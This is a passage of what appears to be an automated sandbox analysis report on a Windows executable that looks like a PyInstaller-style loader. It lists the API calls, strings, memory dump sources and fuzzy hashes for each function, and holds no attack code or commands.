                                                                                                                                                                                              • Part of subcall function 00007FF701267A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7012626FB), ref: 00007FF701267A9A
                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7012667F1,?,?,00000000,?,?,00007FF70126676D), ref: 00007FF7012664FF
                                                                                                                                                                                              • Part of subcall function 00007FF701262770: MessageBoxW.USER32 ref: 00007FF701262845
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF701266513
                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7012664D6
                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF70126655A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                            • Opcode ID: 36c323d19424fe0ac76ca925b523eb1a2808b36d4a593579a88913e209ccb6ab
                                                                                                                                                                                            • Instruction ID: 014f498aebd74f5df0f0cd5ec1e1ee65823f7a812a00f2e0d419aac522d97c9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 36c323d19424fe0ac76ca925b523eb1a2808b36d4a593579a88913e209ccb6ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F316411B1968341FB25B725ED563BAE251AF987C0FC44032DA4E42ADAEFACE5048720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF70126D1CA,?,?,?,00007FF70126CEBC,?,?,00000001,00007FF70126CAD9), ref: 00007FF70126CF9D
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF70126D1CA,?,?,?,00007FF70126CEBC,?,?,00000001,00007FF70126CAD9), ref: 00007FF70126CFAB
                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF70126D1CA,?,?,?,00007FF70126CEBC,?,?,00000001,00007FF70126CAD9), ref: 00007FF70126CFD5
                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF70126D1CA,?,?,?,00007FF70126CEBC,?,?,00000001,00007FF70126CAD9), ref: 00007FF70126D01B
                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF70126D1CA,?,?,?,00007FF70126CEBC,?,?,00000001,00007FF70126CAD9), ref: 00007FF70126D027
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                            • Opcode ID: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                                            • Instruction ID: 591d0a9e36904976e15169dafe3dcdbfe0a6f631f0df403dc40f7142fb5dd9ad
                                                                                                                                                                                            • Opcode Fuzzy Hash: 96cc8d1137d818a2009be7de16c2cee15406677aaf285b7c4d33305375866f21
                                                                                                                                                                                            • Instruction Fuzzy Hash: C131AF21B1B64792EF51BB42AC00A75A294FF48BA0F990536DD5D477D0DFBCE4458720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7012626FB), ref: 00007FF701267A9A
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF701267774,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701262654
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: MessageBoxW.USER32 ref: 00007FF701262730
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7012626FB), ref: 00007FF701267B20
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                            • Opcode ID: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                                            • Instruction ID: 4597b6b29466700a4565d77c5433bf79bbd832146cbad8bf4f784ca7f5fae1b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: ef0c7189470ede6921ef3de76a81d580bff1fc53629992aced72f99ea96e9165
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89218822B09A4381EB50EB19FC400AAE361FF947C4F984132DB4C83FA9EFACD5518710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A65F
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A674
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A695
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A6C2
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A6D3
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A6E4
                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F,?,?,?,00007FF701279343), ref: 00007FF70127A6FF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: e1c5b1d991a3ba091ed7e8305bf8a263b0c3bab683fa35b43ab2c2e69bd206d8
                                                                                                                                                                                            • Instruction ID: df0ef1e96de08b6d1e07daf5e136dbd5cf214c579aaaeb1fb48d7ace55542a1a
                                                                                                                                                                                            • Opcode Fuzzy Hash: e1c5b1d991a3ba091ed7e8305bf8a263b0c3bab683fa35b43ab2c2e69bd206d8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 69215925B0D24346FB58F765AE4117FE2415F857B0F980634E92E076D6DFACA8418720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                            • Opcode ID: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                                            • Instruction ID: f1416859dd1e54d7efe8886fffd583fc56966f0ccb9027a4508fdc24bb2567bc
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8311D021B18A4286E350AB56EC54329F2A0FF88FE4F944234EA1E87B94DFBCD4108760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A7D7
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A80D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A83A
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A84B
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A85C
                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF70127447D,?,?,?,?,00007FF70127DDD7,?,?,00000000,00007FF70127A8E6,?,?,?), ref: 00007FF70127A877
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: f006d7668b7285f7a8b0ef8f9238af911d137d0fc7933ef2d874b855d1a2d336
                                                                                                                                                                                            • Instruction ID: 9eb3958483688e130df7bc412f1c9f8807d2966a0d893d41aea46ff68e36f244
                                                                                                                                                                                            • Opcode Fuzzy Hash: f006d7668b7285f7a8b0ef8f9238af911d137d0fc7933ef2d874b855d1a2d336
                                                                                                                                                                                            • Instruction Fuzzy Hash: D7111521B0864342FB58B765AE4227FA1529F497B0F984734E82E076D6DFACA8428321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                                            • Instruction ID: 7139c77c83d6d5373db7c16c47020afa44688c1ab5ad424cbfcca104204eccd6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 752f63a6eb654042196f5a98f7ed0cc27864ab03d65b16a783a14cfa4978e18e
                                                                                                                                                                                            • Instruction Fuzzy Hash: D851A132B1A64386E714FF15E844A3DB795FF44B88F908130DA9A47788DFB8ED518724
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                            • Opcode ID: c77eb6da1437d11355308ffd2f8c7ab1623b37de00385a783310635bce07de12
                                                                                                                                                                                            • Instruction ID: c5fea7f3ccca04ffb85837987102720418cedb5741fbde15b5d9c8043ee869d8
                                                                                                                                                                                            • Opcode Fuzzy Hash: c77eb6da1437d11355308ffd2f8c7ab1623b37de00385a783310635bce07de12
                                                                                                                                                                                            • Instruction Fuzzy Hash: DD31FC72B09A8389EB24FB61EC552EAA360FF89784F840135EA4D4BA95DFBCD1458710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF701267774,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701262654
                                                                                                                                                                                              • Part of subcall function 00007FF7012674E0: GetLastError.KERNEL32(00000000,00007FF70126269E,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701267507
                                                                                                                                                                                              • Part of subcall function 00007FF7012674E0: FormatMessageW.KERNEL32 ref: 00007FF701267536
                                                                                                                                                                                              • Part of subcall function 00007FF701267A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7012626FB), ref: 00007FF701267A9A
                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF701262730
                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF70126274C
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                            • Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                                            • Instruction ID: 6cbc16f98d289f13464b91c53215c740c106f94cd01cd48f1c6835f112abcc83
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 61312F7272968291E730AB10E8516EAA364FF94784F804036EA8D47A99DFBCD645CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                                            • Instruction ID: 9380c3bdca2c4ad306e6da5e0ffa654a1f22213671f5190560a253b6b45857aa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF06261B1A60381EB10AB24EC4873A9360EF897A1FD40636D56D466E4CFACD449C320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                            • Instruction ID: 8cf4eb77e767882d8ef05d2b1c408e03e629c8eaabbe1ae9ac12af61d5b3fda3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53119422F2AA0B06F7547264FC4237590826F55374FD80B34EA7EC6ED7CFACA8418621
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E,?,?,?,?,?,00007FF70127221C), ref: 00007FF70127A8AF
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E,?,?,?,?,?,00007FF70127221C), ref: 00007FF70127A8CE
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E,?,?,?,?,?,00007FF70127221C), ref: 00007FF70127A8F6
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E,?,?,?,?,?,00007FF70127221C), ref: 00007FF70127A907
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E,?,?,?,?,?,00007FF70127221C), ref: 00007FF70127A918
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                            • Opcode ID: decd09c5d13d42fca7703fcba7a9597a87235a4441fb2811ed88c6e0bb3316ef
                                                                                                                                                                                            • Instruction ID: d3e4d137210fadcf91b262da795d5ccbff6a1cfa20a1a7605dfe8551a827c1e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: decd09c5d13d42fca7703fcba7a9597a87235a4441fb2811ed88c6e0bb3316ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115965B0D60341FB58F325AD422BBE1515F453B0FC94234E83E077D6DFACA8428320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF701282463,?,?,?,00007FF70127CBBC,?,?,00000000,00007FF701273A8F), ref: 00007FF70127A735
